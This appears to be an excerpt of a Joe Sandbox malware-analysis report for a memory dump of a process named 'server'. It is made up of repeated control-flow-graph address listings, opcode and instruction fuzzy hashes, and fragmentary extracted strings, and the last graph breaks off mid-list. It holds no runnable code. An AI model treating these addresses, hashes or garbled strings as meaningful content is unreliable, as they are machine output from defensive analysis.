2fd6ee6-2fd6fb9 5421->5501 5437->5162 5443->5164 5459->5171 5467->5176 5473->5152 5476->5385 5494 2fd64af 5476->5494 5479->5185 5494->5333 5495->5496 5496->5307 5497->5196 5500->5307 5501->5307 5507 2fd5365 5502->5507 5503->5507 5507->5145 5508->5203 5555->5119 5563->5167 5564->5167
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: $:@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3954461808
              • Opcode ID: 3391b5e1caed41fc65dd6da3351d96f2552004da23cb0260d86e3224803463f1
              • Instruction ID: 0c23fecd79dc8a48e5c7d9a52ca65843a2a7d639471784f3dbc0e4cb144fc6b5
              • Opcode Fuzzy Hash: 3391b5e1caed41fc65dd6da3351d96f2552004da23cb0260d86e3224803463f1
              • Instruction Fuzzy Hash: 5DE22874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 5565 2fd4c87-2fd4ce0 5572 2fd4f6c-2fd4f80 5565->5572 5573 2fd4ce6-2fd4f1a 5565->5573 5574 2fd4fda-2fd4fee 5572->5574 5575 2fd4f82-2fd4f89 5572->5575 5996 2fd4f25 5573->5996 5577 2fd503d-2fd5051 5574->5577 5578 2fd4ff0-2fd4ff6 5574->5578 5588 2fd4f93 5575->5588 5580 2fd509a-2fd50ae 5577->5580 5581 2fd5053 5577->5581 5578->5577 5582 2fd5125-2fd5139 5580->5582 5583 2fd50b0-2fd50d9 5580->5583 5581->5580 5586 2fd53ac-2fd53c0 5582->5586 5587 2fd513f-2fd535b 5582->5587 5583->5582 5590 2fd5496-2fd54aa 5586->5590 5591 2fd53c6-2fd53d6 5586->5591 5943 2fd535d 5587->5943 5944 2fd535f 5587->5944 5588->5574 5593 2fd5667-2fd567b 5590->5593 5594 2fd54b0-2fd55df 5590->5594 6004 2fd53dc call 3970606 5591->6004 6005 2fd53dc call 39705df 5591->6005 5598 2fd57de-2fd57f2 5593->5598 5599 2fd5681-2fd578c 5593->5599 5914 2fd55ea-2fd5620 5594->5914 5602 2fd57f8-2fd5903 5598->5602 5603 2fd5955-2fd5969 5598->5603 5860 2fd5797 5599->5860 5878 2fd590e 5602->5878 5605 2fd5acc-2fd5ae0 5603->5605 5606 2fd596f-2fd5a7a 5603->5606 5611 2fd5ae6-2fd5bf1 5605->5611 5612 2fd5c43-2fd5c57 5605->5612 5884 2fd5a85 5606->5884 5608 2fd53e2-2fd5448 5684 2fd544f 5608->5684 5900 2fd5bfc 5611->5900 5616 2fd5c5d-2fd5d68 5612->5616 5617 2fd5dba-2fd5dce 5612->5617 5908 2fd5d73 5616->5908 5625 2fd5dd4-2fd5edf 5617->5625 5626 2fd5f31-2fd5f45 5617->5626 5920 2fd5eea 5625->5920 5632 2fd60a8-2fd60bc 5626->5632 5633 2fd5f4b-2fd6061 5626->5633 5637 2fd621f-2fd6233 5632->5637 5638 2fd60c2-2fd61cd 5632->5638 5633->5632 5643 2fd6239-2fd6344 5637->5643 5644 2fd6396-2fd63aa 5637->5644 5938 2fd61d8 5638->5938 5949 2fd634f 5643->5949 5651 2fd652e-2fd6542 5644->5651 5652 2fd63b0-2fd63f5 call 2fd4270 5644->5652 5661 2fd6548-2fd6567 5651->5661 5662 2fd6685-2fd6699 5651->5662 5774 2fd64b5-2fd64d7 5652->5774 5694 2fd660c-2fd662e 5661->5694 5673 2fd669f-2fd679f 5662->5673 5674 2fd67e6-2fd67fa 5662->5674 5673->5674 5680 2fd6947-2fd695b 5674->5680 5681 2fd6800-2fd6900 5674->5681 5688 2fd6aa8-2fd6ad2 5680->5688 5689 2fd6961-2fd6a61 5680->5689 5681->5680 5684->5590 5717 2fd6ad8-2fd6b4b 5688->5717 5718 2fd6b92-2fd6ba6 5688->5718 5689->5688 5699 2fd656c-2fd657b 5694->5699 5700 2fd6634 5694->5700 5714 2fd6636 5699->5714 5715 2fd6581-2fd6585 5699->5715 5700->5662 5733 2fd663b-2fd6683 5714->5733 5738 2fd6590-2fd65b4 5715->5738 5717->5718 5721 2fd6bac-2fd6c03 5718->5721 5722 2fd6c83-2fd6c97 5718->5722 5851 2fd6c0a-2fd6c3c 5721->5851 5739 2fd6ddd-2fd6df1 5722->5739 5740 2fd6c9d-2fd6d96 5722->5740 5733->5662 5805 2fd65fb-2fd6604 5738->5805 5806 2fd65b6-2fd65f0 5738->5806 5748 2fd7054-2fd7068 5739->5748 5749 2fd6df7-2fd6e47 5739->5749 5740->5739 5758 2fd706e-2fd7109 call 2fd4270 * 2 5748->5758 5759 2fd7150-2fd7157 5748->5759 5861 2fd6e49-2fd6e6f 5749->5861 5862 2fd6eb5-2fd6ee0 5749->5862 5758->5759 5790 2fd64dd 5774->5790 5791 2fd63fa-2fd6409 5774->5791 5790->5651 5799 2fd64df 5791->5799 5800 2fd640f-2fd646f 5791->5800 5826 2fd64e4-2fd652c 5799->5826 5917 2fd6479-2fd64ad 5800->5917 5805->5733 5808 2fd6606 5805->5808 5806->5805 5808->5694 5826->5651 5851->5722 5860->5598 5936 2fd6e71-2fd6e91 5861->5936 5937 2fd6eb0 5861->5937 5941 2fd6fbe-2fd704f 5862->5941 5942 2fd6ee6-2fd6fb9 5862->5942 5878->5603 5884->5605 5900->5612 5908->5617 5914->5593 5917->5826 5935 2fd64af 5917->5935 5920->5626 5935->5774 5936->5937 5937->5748 5938->5637 5941->5748 5942->5748 5948 2fd5365 5943->5948 5944->5948 5948->5586 5949->5644 5996->5572 6004->5608 6005->5608
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$:@%l$:@%l$:@%l$\OLl$2Ll
              • API String ID: 0-63203912
              • Opcode ID: c1c5f9ae2fcc2b6211db3da7129922a20c8cf1c1e48e8d44a567cdf811674f20
              • Instruction ID: f9223cd41864c7900e08fda9748cb1e1e86564afa8388c6c5e4560d40f0916f6
              • Opcode Fuzzy Hash: c1c5f9ae2fcc2b6211db3da7129922a20c8cf1c1e48e8d44a567cdf811674f20
              • Instruction Fuzzy Hash: 3BE23874A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E85CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 6006 2fd4f27-2fd4f80 6013 2fd4fda-2fd4fee 6006->6013 6014 2fd4f82-2fd4f89 6006->6014 6015 2fd503d-2fd5051 6013->6015 6016 2fd4ff0-2fd4ff6 6013->6016 6025 2fd4f93 6014->6025 6018 2fd509a-2fd50ae 6015->6018 6019 2fd5053 6015->6019 6016->6015 6020 2fd5125-2fd5139 6018->6020 6021 2fd50b0-2fd50d9 6018->6021 6019->6018 6023 2fd53ac-2fd53c0 6020->6023 6024 2fd513f-2fd535b 6020->6024 6021->6020 6027 2fd5496-2fd54aa 6023->6027 6028 2fd53c6-2fd53d6 6023->6028 6361 2fd535d 6024->6361 6362 2fd535f 6024->6362 6025->6013 6029 2fd5667-2fd567b 6027->6029 6030 2fd54b0-2fd55df 6027->6030 6411 2fd53dc call 3970606 6028->6411 6412 2fd53dc call 39705df 6028->6412 6034 2fd57de-2fd57f2 6029->6034 6035 2fd5681-2fd578c 6029->6035 6331 2fd55ea-2fd5620 6030->6331 6037 2fd57f8-2fd5903 6034->6037 6038 2fd5955-2fd5969 6034->6038 6287 2fd5797 6035->6287 6299 2fd590e 6037->6299 6040 2fd5acc-2fd5ae0 6038->6040 6041 2fd596f-2fd5a7a 6038->6041 6045 2fd5ae6-2fd5bf1 6040->6045 6046 2fd5c43-2fd5c57 6040->6046 6309 2fd5a85 6041->6309 6043 2fd53e2-2fd5448 6114 2fd544f 6043->6114 6319 2fd5bfc 6045->6319 6050 2fd5c5d-2fd5d68 6046->6050 6051 2fd5dba-2fd5dce 6046->6051 6329 2fd5d73 6050->6329 6058 2fd5dd4-2fd5edf 6051->6058 6059 2fd5f31-2fd5f45 6051->6059 6339 2fd5eea 6058->6339 6064 2fd60a8-2fd60bc 6059->6064 6065 2fd5f4b-2fd6061 6059->6065 6069 2fd621f-2fd6233 6064->6069 6070 2fd60c2-2fd61cd 6064->6070 6065->6064 6076 2fd6239-2fd6344 6069->6076 6077 2fd6396-2fd63aa 6069->6077 6356 2fd61d8 6070->6356 6367 2fd634f 6076->6367 6082 2fd652e-2fd6542 6077->6082 6083 2fd63b0-2fd63f5 call 2fd4270 6077->6083 6092 2fd6548-2fd6567 6082->6092 6093 2fd6685-2fd6699 6082->6093 6199 2fd64b5-2fd64d7 6083->6199 6123 2fd660c-2fd662e 6092->6123 6103 2fd669f-2fd679f 6093->6103 6104 2fd67e6-2fd67fa 6093->6104 6103->6104 6110 2fd6947-2fd695b 6104->6110 6111 2fd6800-2fd6900 6104->6111 6117 2fd6aa8-2fd6ad2 6110->6117 6118 2fd6961-2fd6a61 6110->6118 6111->6110 6114->6027 6145 2fd6ad8-2fd6b4b 6117->6145 6146 2fd6b92-2fd6ba6 6117->6146 6118->6117 6128 2fd656c-2fd657b 6123->6128 6129 2fd6634 6123->6129 6142 2fd6636 6128->6142 6143 2fd6581-2fd6585 6128->6143 6129->6093 6160 2fd663b-2fd6683 6142->6160 6165 2fd6590-2fd65b4 6143->6165 6145->6146 6149 2fd6bac-2fd6c03 6146->6149 6150 2fd6c83-2fd6c97 6146->6150 6270 2fd6c0a-2fd6c3c 6149->6270 6166 2fd6ddd-2fd6df1 6150->6166 6167 2fd6c9d-2fd6d96 6150->6167 6160->6093 6229 2fd65fb-2fd6604 6165->6229 6230 2fd65b6-2fd65f0 6165->6230 6175 2fd7054-2fd7068 6166->6175 6176 2fd6df7-2fd6e47 6166->6176 6167->6166 6184 2fd706e-2fd7109 call 2fd4270 * 2 6175->6184 6185 2fd7150-2fd7157 6175->6185 6289 2fd6e49-2fd6e6f 6176->6289 6290 2fd6eb5-2fd6ee0 6176->6290 6184->6185 6215 2fd64dd 6199->6215 6216 2fd63fa-2fd6409 6199->6216 6215->6082 6223 2fd64df 6216->6223 6224 2fd640f-2fd646f 6216->6224 6255 2fd64e4-2fd652c 6223->6255 6341 2fd6479-2fd64ad 6224->6341 6229->6160 6234 2fd6606 6229->6234 6230->6229 6234->6123 6255->6082 6270->6150 6287->6034 6354 2fd6e71-2fd6e91 6289->6354 6355 2fd6eb0 6289->6355 6358 2fd6fbe-2fd704f 6290->6358 6359 2fd6ee6-2fd6fb9 6290->6359 6299->6038 6309->6040 6319->6046 6329->6051 6331->6029 6339->6059 6341->6255 6360 2fd64af 6341->6360 6354->6355 6355->6175 6356->6069 6358->6175 6359->6175 6360->6199 6366 2fd5365 6361->6366 6362->6366 6366->6023 6367->6077 6411->6043 6412->6043
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 74aa7b43a794e34a279f50dafdb302626c2bac05d17ba4819f072f5e51019df7
              • Instruction ID: af85a4e11cb941fe5b43f751a876b1d3174f34c8df2a16975f868bdd448c64c7
              • Opcode Fuzzy Hash: 74aa7b43a794e34a279f50dafdb302626c2bac05d17ba4819f072f5e51019df7
              • Instruction Fuzzy Hash: 27D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 6413 2fd4f95-2fd4fee 6420 2fd503d-2fd5051 6413->6420 6421 2fd4ff0-2fd4ff6 6413->6421 6422 2fd509a-2fd50ae 6420->6422 6423 2fd5053 6420->6423 6421->6420 6424 2fd5125-2fd5139 6422->6424 6425 2fd50b0-2fd50d9 6422->6425 6423->6422 6427 2fd53ac-2fd53c0 6424->6427 6428 2fd513f-2fd535b 6424->6428 6425->6424 6430 2fd5496-2fd54aa 6427->6430 6431 2fd53c6-2fd53d6 6427->6431 6764 2fd535d 6428->6764 6765 2fd535f 6428->6765 6432 2fd5667-2fd567b 6430->6432 6433 2fd54b0-2fd55df 6430->6433 6814 2fd53dc call 3970606 6431->6814 6815 2fd53dc call 39705df 6431->6815 6437 2fd57de-2fd57f2 6432->6437 6438 2fd5681-2fd578c 6432->6438 6734 2fd55ea-2fd5620 6433->6734 6440 2fd57f8-2fd5903 6437->6440 6441 2fd5955-2fd5969 6437->6441 6690 2fd5797 6438->6690 6702 2fd590e 6440->6702 6443 2fd5acc-2fd5ae0 6441->6443 6444 2fd596f-2fd5a7a 6441->6444 6448 2fd5ae6-2fd5bf1 6443->6448 6449 2fd5c43-2fd5c57 6443->6449 6712 2fd5a85 6444->6712 6446 2fd53e2-2fd5448 6517 2fd544f 6446->6517 6722 2fd5bfc 6448->6722 6453 2fd5c5d-2fd5d68 6449->6453 6454 2fd5dba-2fd5dce 6449->6454 6732 2fd5d73 6453->6732 6461 2fd5dd4-2fd5edf 6454->6461 6462 2fd5f31-2fd5f45 6454->6462 6742 2fd5eea 6461->6742 6467 2fd60a8-2fd60bc 6462->6467 6468 2fd5f4b-2fd6061 6462->6468 6472 2fd621f-2fd6233 6467->6472 6473 2fd60c2-2fd61cd 6467->6473 6468->6467 6479 2fd6239-2fd6344 6472->6479 6480 2fd6396-2fd63aa 6472->6480 6759 2fd61d8 6473->6759 6770 2fd634f 6479->6770 6485 2fd652e-2fd6542 6480->6485 6486 2fd63b0-2fd63f5 call 2fd4270 6480->6486 6495 2fd6548-2fd6567 6485->6495 6496 2fd6685-2fd6699 6485->6496 6602 2fd64b5-2fd64d7 6486->6602 6526 2fd660c-2fd662e 6495->6526 6506 2fd669f-2fd679f 6496->6506 6507 2fd67e6-2fd67fa 6496->6507 6506->6507 6513 2fd6947-2fd695b 6507->6513 6514 2fd6800-2fd6900 6507->6514 6520 2fd6aa8-2fd6ad2 6513->6520 6521 2fd6961-2fd6a61 6513->6521 6514->6513 6517->6430 6548 2fd6ad8-2fd6b4b 6520->6548 6549 2fd6b92-2fd6ba6 6520->6549 6521->6520 6531 2fd656c-2fd657b 6526->6531 6532 2fd6634 6526->6532 6545 2fd6636 6531->6545 6546 2fd6581-2fd6585 6531->6546 6532->6496 6563 2fd663b-2fd6683 6545->6563 6568 2fd6590-2fd65b4 6546->6568 6548->6549 6552 2fd6bac-2fd6c03 6549->6552 6553 2fd6c83-2fd6c97 6549->6553 6673 2fd6c0a-2fd6c3c 6552->6673 6569 2fd6ddd-2fd6df1 6553->6569 6570 2fd6c9d-2fd6d96 6553->6570 6563->6496 6632 2fd65fb-2fd6604 6568->6632 6633 2fd65b6-2fd65f0 6568->6633 6578 2fd7054-2fd7068 6569->6578 6579 2fd6df7-2fd6e47 6569->6579 6570->6569 6587 2fd706e-2fd7109 call 2fd4270 * 2 6578->6587 6588 2fd7150-2fd7157 6578->6588 6692 2fd6e49-2fd6e6f 6579->6692 6693 2fd6eb5-2fd6ee0 6579->6693 6587->6588 6618 2fd64dd 6602->6618 6619 2fd63fa-2fd6409 6602->6619 6618->6485 6626 2fd64df 6619->6626 6627 2fd640f-2fd646f 6619->6627 6658 2fd64e4-2fd652c 6626->6658 6744 2fd6479-2fd64ad 6627->6744 6632->6563 6637 2fd6606 6632->6637 6633->6632 6637->6526 6658->6485 6673->6553 6690->6437 6757 2fd6e71-2fd6e91 6692->6757 6758 2fd6eb0 6692->6758 6761 2fd6fbe-2fd704f 6693->6761 6762 2fd6ee6-2fd6fb9 6693->6762 6702->6441 6712->6443 6722->6449 6732->6454 6734->6432 6742->6462 6744->6658 6763 2fd64af 6744->6763 6757->6758 6758->6578 6759->6472 6761->6578 6762->6578 6763->6602 6769 2fd5365 6764->6769 6765->6769 6769->6427 6770->6480 6814->6446 6815->6446
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 25a4236052f2daf0888960ec347d8e4c03c2f96649f075131073fec57ca63041
              • Instruction ID: 58cebf477421af50726ae9f7e90753ced853627593f178f33953f2e414887d0e
              • Opcode Fuzzy Hash: 25a4236052f2daf0888960ec347d8e4c03c2f96649f075131073fec57ca63041
              • Instruction Fuzzy Hash: 08D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 6816 2fd4ff8-2fd5051 6823 2fd509a-2fd50ae 6816->6823 6824 2fd5053 6816->6824 6825 2fd5125-2fd5139 6823->6825 6826 2fd50b0-2fd50d9 6823->6826 6824->6823 6827 2fd53ac-2fd53c0 6825->6827 6828 2fd513f-2fd535b 6825->6828 6826->6825 6830 2fd5496-2fd54aa 6827->6830 6831 2fd53c6-2fd53d6 6827->6831 7164 2fd535d 6828->7164 7165 2fd535f 6828->7165 6832 2fd5667-2fd567b 6830->6832 6833 2fd54b0-2fd55df 6830->6833 7214 2fd53dc call 3970606 6831->7214 7215 2fd53dc call 39705df 6831->7215 6837 2fd57de-2fd57f2 6832->6837 6838 2fd5681-2fd578c 6832->6838 7134 2fd55ea-2fd5620 6833->7134 6840 2fd57f8-2fd5903 6837->6840 6841 2fd5955-2fd5969 6837->6841 7090 2fd5797 6838->7090 7102 2fd590e 6840->7102 6843 2fd5acc-2fd5ae0 6841->6843 6844 2fd596f-2fd5a7a 6841->6844 6848 2fd5ae6-2fd5bf1 6843->6848 6849 2fd5c43-2fd5c57 6843->6849 7112 2fd5a85 6844->7112 6846 2fd53e2-2fd5448 6917 2fd544f 6846->6917 7122 2fd5bfc 6848->7122 6853 2fd5c5d-2fd5d68 6849->6853 6854 2fd5dba-2fd5dce 6849->6854 7132 2fd5d73 6853->7132 6861 2fd5dd4-2fd5edf 6854->6861 6862 2fd5f31-2fd5f45 6854->6862 7142 2fd5eea 6861->7142 6867 2fd60a8-2fd60bc 6862->6867 6868 2fd5f4b-2fd6061 6862->6868 6872 2fd621f-2fd6233 6867->6872 6873 2fd60c2-2fd61cd 6867->6873 6868->6867 6879 2fd6239-2fd6344 6872->6879 6880 2fd6396-2fd63aa 6872->6880 7159 2fd61d8 6873->7159 7170 2fd634f 6879->7170 6885 2fd652e-2fd6542 6880->6885 6886 2fd63b0-2fd63f5 call 2fd4270 6880->6886 6895 2fd6548-2fd6567 6885->6895 6896 2fd6685-2fd6699 6885->6896 7002 2fd64b5-2fd64d7 6886->7002 6926 2fd660c-2fd662e 6895->6926 6906 2fd669f-2fd679f 6896->6906 6907 2fd67e6-2fd67fa 6896->6907 6906->6907 6913 2fd6947-2fd695b 6907->6913 6914 2fd6800-2fd6900 6907->6914 6920 2fd6aa8-2fd6ad2 6913->6920 6921 2fd6961-2fd6a61 6913->6921 6914->6913 6917->6830 6948 2fd6ad8-2fd6b4b 6920->6948 6949 2fd6b92-2fd6ba6 6920->6949 6921->6920 6931 2fd656c-2fd657b 6926->6931 6932 2fd6634 6926->6932 6945 2fd6636 6931->6945 6946 2fd6581-2fd6585 6931->6946 6932->6896 6963 2fd663b-2fd6683 6945->6963 6968 2fd6590-2fd65b4 6946->6968 6948->6949 6952 2fd6bac-2fd6c03 6949->6952 6953 2fd6c83-2fd6c97 6949->6953 7073 2fd6c0a-2fd6c3c 6952->7073 6969 2fd6ddd-2fd6df1 6953->6969 6970 2fd6c9d-2fd6d96 6953->6970 6963->6896 7032 2fd65fb-2fd6604 6968->7032 7033 2fd65b6-2fd65f0 6968->7033 6978 2fd7054-2fd7068 6969->6978 6979 2fd6df7-2fd6e47 6969->6979 6970->6969 6987 2fd706e-2fd7109 call 2fd4270 * 2 6978->6987 6988 2fd7150-2fd7157 6978->6988 7092 2fd6e49-2fd6e6f 6979->7092 7093 2fd6eb5-2fd6ee0 6979->7093 6987->6988 7018 2fd64dd 7002->7018 7019 2fd63fa-2fd6409 7002->7019 7018->6885 7026 2fd64df 7019->7026 7027 2fd640f-2fd646f 7019->7027 7058 2fd64e4-2fd652c 7026->7058 7144 2fd6479-2fd64ad 7027->7144 7032->6963 7037 2fd6606 7032->7037 7033->7032 7037->6926 7058->6885 7073->6953 7090->6837 7157 2fd6e71-2fd6e91 7092->7157 7158 2fd6eb0 7092->7158 7161 2fd6fbe-2fd704f 7093->7161 7162 2fd6ee6-2fd6fb9 7093->7162 7102->6841 7112->6843 7122->6849 7132->6854 7134->6832 7142->6862 7144->7058 7163 2fd64af 7144->7163 7157->7158 7158->6978 7159->6872 7161->6978 7162->6978 7163->7002 7169 2fd5365 7164->7169 7165->7169 7169->6827 7170->6880 7214->6846 7215->6846
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 9d73927dd6441f5b1bf8f6b3703dc6506f1e4ee3b7f3dc4f78c31f03aebbd7e1
              • Instruction ID: eecbe5c18fb5cb9a8c27cf714e40a8093bcc273ec2dc44180e358bfb3f8391dd
              • Opcode Fuzzy Hash: 9d73927dd6441f5b1bf8f6b3703dc6506f1e4ee3b7f3dc4f78c31f03aebbd7e1
              • Instruction Fuzzy Hash: 96D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 7216 2fd5055-2fd50ae 7223 2fd5125-2fd5139 7216->7223 7224 2fd50b0-2fd50d9 7216->7224 7225 2fd53ac-2fd53c0 7223->7225 7226 2fd513f-2fd535b 7223->7226 7224->7223 7228 2fd5496-2fd54aa 7225->7228 7229 2fd53c6-2fd53d6 7225->7229 7562 2fd535d 7226->7562 7563 2fd535f 7226->7563 7230 2fd5667-2fd567b 7228->7230 7231 2fd54b0-2fd55df 7228->7231 7612 2fd53dc call 3970606 7229->7612 7613 2fd53dc call 39705df 7229->7613 7235 2fd57de-2fd57f2 7230->7235 7236 2fd5681-2fd578c 7230->7236 7532 2fd55ea-2fd5620 7231->7532 7238 2fd57f8-2fd5903 7235->7238 7239 2fd5955-2fd5969 7235->7239 7488 2fd5797 7236->7488 7500 2fd590e 7238->7500 7241 2fd5acc-2fd5ae0 7239->7241 7242 2fd596f-2fd5a7a 7239->7242 7246 2fd5ae6-2fd5bf1 7241->7246 7247 2fd5c43-2fd5c57 7241->7247 7510 2fd5a85 7242->7510 7244 2fd53e2-2fd5448 7315 2fd544f 7244->7315 7520 2fd5bfc 7246->7520 7251 2fd5c5d-2fd5d68 7247->7251 7252 2fd5dba-2fd5dce 7247->7252 7530 2fd5d73 7251->7530 7259 2fd5dd4-2fd5edf 7252->7259 7260 2fd5f31-2fd5f45 7252->7260 7540 2fd5eea 7259->7540 7265 2fd60a8-2fd60bc 7260->7265 7266 2fd5f4b-2fd6061 7260->7266 7270 2fd621f-2fd6233 7265->7270 7271 2fd60c2-2fd61cd 7265->7271 7266->7265 7277 2fd6239-2fd6344 7270->7277 7278 2fd6396-2fd63aa 7270->7278 7557 2fd61d8 7271->7557 7568 2fd634f 7277->7568 7283 2fd652e-2fd6542 7278->7283 7284 2fd63b0-2fd63f5 call 2fd4270 7278->7284 7293 2fd6548-2fd6567 7283->7293 7294 2fd6685-2fd6699 7283->7294 7400 2fd64b5-2fd64d7 7284->7400 7324 2fd660c-2fd662e 7293->7324 7304 2fd669f-2fd679f 7294->7304 7305 2fd67e6-2fd67fa 7294->7305 7304->7305 7311 2fd6947-2fd695b 7305->7311 7312 2fd6800-2fd6900 7305->7312 7318 2fd6aa8-2fd6ad2 7311->7318 7319 2fd6961-2fd6a61 7311->7319 7312->7311 7315->7228 7346 2fd6ad8-2fd6b4b 7318->7346 7347 2fd6b92-2fd6ba6 7318->7347 7319->7318 7329 2fd656c-2fd657b 7324->7329 7330 2fd6634 7324->7330 7343 2fd6636 7329->7343 7344 2fd6581-2fd6585 7329->7344 7330->7294 7361 2fd663b-2fd6683 7343->7361 7366 2fd6590-2fd65b4 7344->7366 7346->7347 7350 2fd6bac-2fd6c03 7347->7350 7351 2fd6c83-2fd6c97 7347->7351 7471 2fd6c0a-2fd6c3c 7350->7471 7367 2fd6ddd-2fd6df1 7351->7367 7368 2fd6c9d-2fd6d96 7351->7368 7361->7294 7430 2fd65fb-2fd6604 7366->7430 7431 2fd65b6-2fd65f0 7366->7431 7376 2fd7054-2fd7068 7367->7376 7377 2fd6df7-2fd6e47 7367->7377 7368->7367 7385 2fd706e-2fd7109 call 2fd4270 * 2 7376->7385 7386 2fd7150-2fd7157 7376->7386 7490 2fd6e49-2fd6e6f 7377->7490 7491 2fd6eb5-2fd6ee0 7377->7491 7385->7386 7416 2fd64dd 7400->7416 7417 2fd63fa-2fd6409 7400->7417 7416->7283 7424 2fd64df 7417->7424 7425 2fd640f-2fd646f 7417->7425 7456 2fd64e4-2fd652c 7424->7456 7542 2fd6479-2fd64ad 7425->7542 7430->7361 7435 2fd6606 7430->7435 7431->7430 7435->7324 7456->7283 7471->7351 7488->7235 7555 2fd6e71-2fd6e91 7490->7555 7556 2fd6eb0 7490->7556 7559 2fd6fbe-2fd704f 7491->7559 7560 2fd6ee6-2fd6fb9 7491->7560 7500->7239 7510->7241 7520->7247 7530->7252 7532->7230 7540->7260 7542->7456 7561 2fd64af 7542->7561 7555->7556 7556->7376 7557->7270 7559->7376 7560->7376 7561->7400 7567 2fd5365 7562->7567 7563->7567 7567->7225 7568->7278 7612->7244 7613->7244
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_2fd0000_server.jbxd
              Similarity
              • API ID:
              • String ID: :@%l$:@%l$\OLl$2Ll
              • API String ID: 0-3794265009
              • Opcode ID: 083bf3bccc36435a38bf5b2d720d38f63722c1c15522aab327ed878a7f1219b2
              • Instruction ID: 1896361b65e3b84e7b6f1dc660c8260080d4677907466b372948519542d479f5
              • Opcode Fuzzy Hash: 083bf3bccc36435a38bf5b2d720d38f63722c1c15522aab327ed878a7f1219b2
              • Instruction Fuzzy Hash: B0D21675A412288FDB25DF20D864BADB7B6FB49308F0041EAD949A73A0DF359E84CF51

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 7614 2fd50db-2fd5139 7622 2fd53ac-2fd53c0 7614->7622 7623 2fd513f-2fd535b 7614->7623 7624 2fd5496-2fd54aa 7622->7624 7625 2fd53c6-2fd53d6 7622->7625 7956 2fd535d 7623->7956 7957 2fd535f 7623->7957 7626 2fd5667-2fd567b 7624->7626 7627 2fd54b0-2fd55df 7624->7627 8006 2fd53dc call 3970606 7625->8006 8007 2fd53dc call 39705df 7625->8007 7630 2fd57de-2fd57f2 7626->7630 7631 2fd5681-2fd578c 7626->7631 7926 2fd55ea-2fd5620 7627->7926 7633 2fd57f8-2fd5903 7630->7633 7634 2fd5955-2fd5969 7630->7634 7882 2fd5797 7631->7882 7894 2fd590e 7633->7894 7636 2fd5acc-2fd5ae0 7634->7636 7637 2fd596f-2fd5a7a 7634->7637 7640 2fd5ae6-2fd5bf1 7636->7640 7641 2fd5c43-2fd5c57 7636->7641 7904 2fd5a85 7637->7904 7638 2fd53e2-2fd5448 7709 2fd544f 7638->7709 7914 2fd5bfc 7640->7914 7645 2fd5c5d-2fd5d68 7641->7645 7646 2fd5dba-2fd5dce 7641->7646 7924 2fd5d73 7645->7924 7653 2fd5dd4-2fd5edf 7646->7653 7654 2fd5f31-2fd5f45 7646->7654 7934 2fd5eea 7653->7934 7659 2fd60a8-2fd60bc 7654->7659 7660 2fd5f4b-2fd6061 7654->7660 7664 2fd621f-2fd6233 7659->7664 7665 2fd60c2-2fd61cd 7659->7665 7660->7659 7671 2fd6239-2fd6344 7664->7671 7672 2fd6396-2fd63aa 7664->7672 7951 2fd61d8 7665->7951 7962 2fd634f 7671->7962 7677 2fd652e-2fd6542 7672->7677 7678 2fd63b0-2fd63f5 call 2fd4270 7672->7678 7687 2fd6548-2fd6567 7677->7687 7688 2fd6685-2fd6699 7677->7688 7794 2fd64b5-2fd64d7 7678->7794 7718 2fd660c-2fd662e 7687->7718 7698 2fd669f-2fd679f 7688->7698 7699 2fd67e6-2fd67fa 7688->7699 7698->7699 7705 2fd6947-2fd695b 7699->7705 7706 2fd6800-2fd6900 7699->7706 7712 2fd6aa8-2fd6ad2 7705->7712 7713 2fd6961-2fd6a61 7705->7713 7706->7705 7709->7624 7740 2fd6ad8-2fd6b4b 7712->7740 7741 2fd6b92-2fd6ba6 7712->7741 7713->7712 7723 2fd656c-2fd657b 7718->7723 7724 2fd6634 7718->7724 7737 2fd6636 7723->7737 7738 2fd6581-2fd6585 7723->7738 7724->7688 7755 2fd663b-2fd6683 7737->7755 